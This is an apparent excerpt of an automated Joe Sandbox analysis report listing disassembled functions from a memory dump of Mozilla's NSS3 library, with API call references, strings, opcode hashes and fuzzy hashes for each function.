                                                            • Opcode ID: 344be48aa9c992ac0ed6650e212f2a5123d8a730f097e377ef96a9e41603f521
                                                            • Instruction ID: 682f2b41cdaf8804c778ba7a89169e06f94f738252292f9e994def727b63237c
                                                            • Opcode Fuzzy Hash: 344be48aa9c992ac0ed6650e212f2a5123d8a730f097e377ef96a9e41603f521
                                                            • Instruction Fuzzy Hash: AE612BB2E00746AFD715DF75C884AA7BBF8FF08208B044529E859C7B11E730E858CBA5
                                                            Function 6CA34CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CA34CF3
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA34D28
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA34D37
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA34D4D
                                                            • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CA34D7B
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA34D8A
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA34DA0
                                                            • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CA34DBC
                                                            • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CA34E20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                            • API String ID: 1003633598-3553622718
                                                            • Opcode ID: 0e6cbb9e502b584c741f1b7ba4a8dedc4c0d5ce763cf841bca792c55d9fc1283
                                                            • Instruction ID: 8d4d9c780b98f9f7742dd8bbd3a357d097a146e5aacaf475d46899ff73cb4295
                                                            • Opcode Fuzzy Hash: 0e6cbb9e502b584c741f1b7ba4a8dedc4c0d5ce763cf841bca792c55d9fc1283
                                                            • Instruction Fuzzy Hash: E5413735604160AFEB028F14ED98F7E7BB9EB4239DF084024F40CEBA51DB358898CB52
                                                            Function 6CA37C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_Verify), ref: 6CA37CB6
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA37CE4
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA37CF3
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA37D09
                                                            • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CA37D2A
                                                            • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CA37D45
                                                            • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CA37D5E
                                                            • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CA37D77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                            • API String ID: 1003633598-3278097884
                                                            • Opcode ID: 98a7fc0b72230133d98515b45b9b437af5aa7b7e883a2f6cd1c3eee92e11c8cc
                                                            • Instruction ID: 937de58a3ff4f5ba43e035dd39f68e9ceec9a3da6403e2850f6f7aaec9ec28f4
                                                            • Opcode Fuzzy Hash: 98a7fc0b72230133d98515b45b9b437af5aa7b7e883a2f6cd1c3eee92e11c8cc
                                                            • Instruction Fuzzy Hash: 4D31F535601194EFEB01CF65EE58F7A37B5AB42398F485024F40DDBA51DB348898CBA2
                                                            Function 6CACCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CACCC7B), ref: 6CACCD7A
                                                              • Part of subcall function 6CACCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CA3C1A8,?), ref: 6CACCE92
                                                            • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CACCDA5
                                                            • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CACCDB8
                                                            • PR_UnloadLibrary.NSS3(00000000), ref: 6CACCDDB
                                                            • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CACCD8E
                                                              • Part of subcall function 6C9F05C0: PR_EnterMonitor.NSS3 ref: 6C9F05D1
                                                              • Part of subcall function 6C9F05C0: PR_ExitMonitor.NSS3 ref: 6C9F05EA
                                                            • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CACCDE8
                                                            • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CACCDFF
                                                            • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CACCE16
                                                            • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CACCE29
                                                            • PR_UnloadLibrary.NSS3(00000000), ref: 6CACCE48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                            • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                            • API String ID: 601260978-871931242
                                                            • Opcode ID: ddd4d501174a27e34a023c62adc699f741ca0dfab719cc94f86bd2d95e656175
                                                            • Instruction ID: bfc3d5de411543c729fbc4672383f796ddc73c7d0fc63dea409665d6ea03497e
                                                            • Opcode Fuzzy Hash: ddd4d501174a27e34a023c62adc699f741ca0dfab719cc94f86bd2d95e656175
                                                            • Instruction Fuzzy Hash: 4111D6ADF0256156EB02AA776C00AAA386C5B2321DF1C5535EC19D6F40FB20C58A87F3
                                                            Function 6CB11C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CB113BC,?,?,?,6CB11193), ref: 6CB11C6B
                                                            • PR_NewLock.NSS3(?,6CB11193), ref: 6CB11C7E
                                                              • Part of subcall function 6CAC98D0: calloc.MOZGLUE(00000001,00000084,6C9F0936,00000001,?,6C9F102C), ref: 6CAC98E5
                                                            • PR_NewCondVar.NSS3(00000000,?,6CB11193), ref: 6CB11C91
                                                              • Part of subcall function 6C9EBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C9F21BC), ref: 6C9EBB8C
                                                            • PR_NewCondVar.NSS3(00000000,?,?,6CB11193), ref: 6CB11CA7
                                                              • Part of subcall function 6C9EBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C9EBBEB
                                                              • Part of subcall function 6C9EBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C9EBBFB
                                                              • Part of subcall function 6C9EBB80: GetLastError.KERNEL32 ref: 6C9EBC03
                                                              • Part of subcall function 6C9EBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C9EBC19
                                                              • Part of subcall function 6C9EBB80: free.MOZGLUE(00000000), ref: 6C9EBC22
                                                            • PR_NewCondVar.NSS3(00000000,?,?,?,6CB11193), ref: 6CB11CBE
                                                            • PR_NewCondVar.NSS3(00000000,?,?,?,?,6CB11193), ref: 6CB11CD4
                                                            • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CB11193), ref: 6CB11CFE
                                                            • PR_Lock.NSS3(?,?,?,?,?,?,?,6CB11193), ref: 6CB11D1A
                                                              • Part of subcall function 6CAC9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C9F1A48), ref: 6CAC9BB3
                                                              • Part of subcall function 6CAC9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C9F1A48), ref: 6CAC9BC8
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CB11193), ref: 6CB11D3D
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,6CB11193), ref: 6CB11D4E
                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CB11193), ref: 6CB11D64
                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CB11193), ref: 6CB11D6F
                                                            • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CB11193), ref: 6CB11D7B
                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,?,6CB11193), ref: 6CB11D87
                                                            • PR_DestroyCondVar.NSS3(00000000,?,?,?,6CB11193), ref: 6CB11D93
                                                            • PR_DestroyLock.NSS3(00000000,?,?,6CB11193), ref: 6CB11D9F
                                                            • free.MOZGLUE(00000000,?,6CB11193), ref: 6CB11DA8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                            • String ID:
                                                            • API String ID: 3246495057-0
                                                            • Opcode ID: f9f4ba83c771375d7cf0ac17ae4cf7c10855b2c38695a4f1bacf874b9b1d259a
                                                            • Instruction ID: b45ab1a20ff9c0928b583bf97b62baef0a38df530526ff019f6c68d240eb398a
                                                            • Opcode Fuzzy Hash: f9f4ba83c771375d7cf0ac17ae4cf7c10855b2c38695a4f1bacf874b9b1d259a
                                                            • Instruction Fuzzy Hash: 8531D7F5E007115FEB119F65AC41AA77AF4AF2560CB084438E84A87F41FB31E408CBA3
                                                            Function 6CA65CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CA65EC0,00000000,?,?), ref: 6CA65CBE
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CA65CD7
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CA65CF0
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CA65D09
                                                            • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CA65EC0,00000000,?,?), ref: 6CA65D1F
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CA65D3C
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA65D51
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA65D66
                                                            • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CA65D80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: strncmp$SecureStrdup_Util
                                                            • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                            • API String ID: 1171493939-3017051476
                                                            • Opcode ID: 36abd1f7bd99d880dfda191d0ef9fb19ead5824221792d8bbdf52a29c38bd94a
                                                            • Instruction ID: 9c7f24d54e10a01264a6e9b2ce5e47d6b5cf2b00f1b6795b9bb948ce96f25874
                                                            • Opcode Fuzzy Hash: 36abd1f7bd99d880dfda191d0ef9fb19ead5824221792d8bbdf52a29c38bd94a
                                                            • Instruction Fuzzy Hash: 3331F4F4B41381ABFB029E26CC48B663769AF1225CF280430EE55A7EC3E7B1E555C295
                                                            Function 6CA66CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CB31DE0,?), ref: 6CA66CFE
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA66D26
                                                            • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CA66D70
                                                            • PORT_Alloc_Util.NSS3(00000480), ref: 6CA66D82
                                                            • DER_GetInteger_Util.NSS3(?), ref: 6CA66DA2
                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA66DD8
                                                            • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CA66E60
                                                            • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CA66F19
                                                            • PK11_DigestBegin.NSS3(00000000), ref: 6CA66F2D
                                                            • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CA66F7B
                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA67011
                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CA67033
                                                            • free.MOZGLUE(?), ref: 6CA6703F
                                                            • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CA67060
                                                            • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CA67087
                                                            • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CA670AF
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                            • String ID:
                                                            • API String ID: 2108637330-0
                                                            • Opcode ID: 43e48eb70c05c4f56932a244eeedab354efeb275b93afeabf11dee2e19d515b0
                                                            • Instruction ID: 2f8e9a5352d6e89fb86baa7533610873fa0f00ac0e63aa1a5ef68f1ad2a69430
                                                            • Opcode Fuzzy Hash: 43e48eb70c05c4f56932a244eeedab354efeb275b93afeabf11dee2e19d515b0
                                                            • Instruction Fuzzy Hash: 3DA129719182009BEB009F26DD55B6B32A5DB8130CF288939E968CBF81E775D8D9C793
                                                            Function 6CA7AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA7ADB1
                                                              • Part of subcall function 6CA5BE30: SECOID_FindOID_Util.NSS3(6CA1311B,00000000,?,6CA1311B,?), ref: 6CA5BE44
                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA7ADF4
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA7AE08
                                                              • Part of subcall function 6CA5B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB318D0,?), ref: 6CA5B095
                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA7AE25
                                                            • PL_FreeArenaPool.NSS3 ref: 6CA7AE63
                                                            • PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA7AE4D
                                                              • Part of subcall function 6C984C70: TlsGetValue.KERNEL32(?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984C97
                                                              • Part of subcall function 6C984C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CB0
                                                              • Part of subcall function 6C984C70: PR_Unlock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CC9
                                                            • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA7AE93
                                                            • PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA7AECC
                                                            • PL_FreeArenaPool.NSS3 ref: 6CA7AEDE
                                                            • PL_FinishArenaPool.NSS3 ref: 6CA7AEE6
                                                            • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA7AEF5
                                                            • PL_FinishArenaPool.NSS3 ref: 6CA7AF16
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                            • String ID: security
                                                            • API String ID: 3441714441-3315324353
                                                            • Opcode ID: 347d1bdef61c0bc1e0d2312c9254d7b5146859520e0a79b4d158ff3c470bb91b
                                                            • Instruction ID: 280bf3f71b4b6792a3ae293951e5bc1e9bc722111252a09007ea159eeb2a5b67
                                                            • Opcode Fuzzy Hash: 347d1bdef61c0bc1e0d2312c9254d7b5146859520e0a79b4d158ff3c470bb91b
                                                            • Instruction Fuzzy Hash: 6F4115BA904220B6F7314B25DD44BAA32B9BF4221DF180525E81492F81EB35DDD886F3
                                                            Function 6CA95CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA92BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CA92A28,00000060,00000001), ref: 6CA92BF0
                                                              • Part of subcall function 6CA92BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CA92A28,00000060,00000001), ref: 6CA92C07
                                                              • Part of subcall function 6CA92BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CA92A28,00000060,00000001), ref: 6CA92C1E
                                                              • Part of subcall function 6CA92BE0: free.MOZGLUE(?,00000000,00000000,?,6CA92A28,00000060,00000001), ref: 6CA92C4A
                                                            • free.MOZGLUE(?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95D0F
                                                            • free.MOZGLUE(?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95D4E
                                                            • free.MOZGLUE(?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95D62
                                                            • free.MOZGLUE(?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95D85
                                                            • free.MOZGLUE(?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95D99
                                                            • free.MOZGLUE(?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95DFA
                                                            • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95E33
                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CA95E3E
                                                            • free.MOZGLUE(?,?,?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CA95E47
                                                            • free.MOZGLUE(?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95E60
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CA95E78
                                                            • free.MOZGLUE(?,?,?,?,?,?,?,6CA9AAD4), ref: 6CA95EB9
                                                            • free.MOZGLUE(?,?,?,?,?,?,?,6CA9AAD4), ref: 6CA95EF0
                                                            • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CA95F3D
                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CA95F4B
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                            • String ID:
                                                            • API String ID: 4273776295-0
                                                            • Opcode ID: 236e70b064d0648655fb0d33adc39a9c766afe50d677d1ac32e331bed0e0a064
                                                            • Instruction ID: d4b243ff8259bbecec76b07162897325ca10c010752e1aa0e377493f3e7dff71
                                                            • Opcode Fuzzy Hash: 236e70b064d0648655fb0d33adc39a9c766afe50d677d1ac32e331bed0e0a064
                                                            • Instruction Fuzzy Hash: 1B71C4B4A00B019FD700CF24D986A9277F6FF49309F148629E85E87B11E732F999CB91
                                                            Function 6CA18DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,?), ref: 6CA18E22
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA18E36
                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CA18E4F
                                                            • calloc.MOZGLUE(00000001,?,?,?), ref: 6CA18E78
                                                            • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CA18E9B
                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA18EAC
                                                            • PL_ArenaAllocate.NSS3(?,?), ref: 6CA18EDE
                                                            • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CA18EF0
                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CA18F00
                                                            • free.MOZGLUE(?), ref: 6CA18F0E
                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CA18F39
                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CA18F4A
                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CA18F5B
                                                            • PR_Unlock.NSS3(?), ref: 6CA18F72
                                                            • PR_Unlock.NSS3(?), ref: 6CA18F82
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
